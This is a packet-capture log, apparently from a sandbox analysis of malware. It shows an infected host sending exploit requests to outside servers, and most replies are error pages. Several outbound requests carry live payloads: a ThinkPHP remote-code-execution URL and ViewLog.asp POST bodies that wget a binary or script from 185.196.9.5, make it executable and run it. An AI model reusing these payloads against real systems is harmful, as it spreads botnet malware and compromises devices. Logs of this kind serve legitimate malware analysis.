Feb 25, 2024 19:03:58.176459074 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:58 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
600	192.168.2.15	54558	95.101.1.209	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:58.020103931 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:58.275389910 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:03:58 GMT Date: Sun, 25 Feb 2024 18:03:58 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 65 62 30 66 37 34 38 26 23 34 36 3b 31 37 30 38 38 38 34 32 33 38 26 23 34 36 3b 35 32 65 39 37 32 62 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.3eb0f748.1708884238.52e972b2</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
601	192.168.2.15	37542	95.182.234.169	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:58.131784916 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:58.322405100 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:57 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:03:58.812870026 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:57 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:03:59.435143948 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:57 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:04:00.539921045 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:57 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:04:02.761866093 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:57 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:04:07.182243109 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:57 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:04:16.024508953 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:57 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
602	192.168.2.15	33656	85.214.110.186	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:58.143167973 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:58.340280056 CET	1175	IN	HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=utf-8 Content-Length: 1012 Date: Sun, 25 Feb 2024 18:03:58 GMT Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 33 35 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 33 35 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Apache Tomcat/6.0.35 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource (/cgi-bin/ViewLog.asp) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.35</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
603	192.168.2.15	37140	85.214.223.86	8080

Timestamp	Bytes transferred	Direction	Data
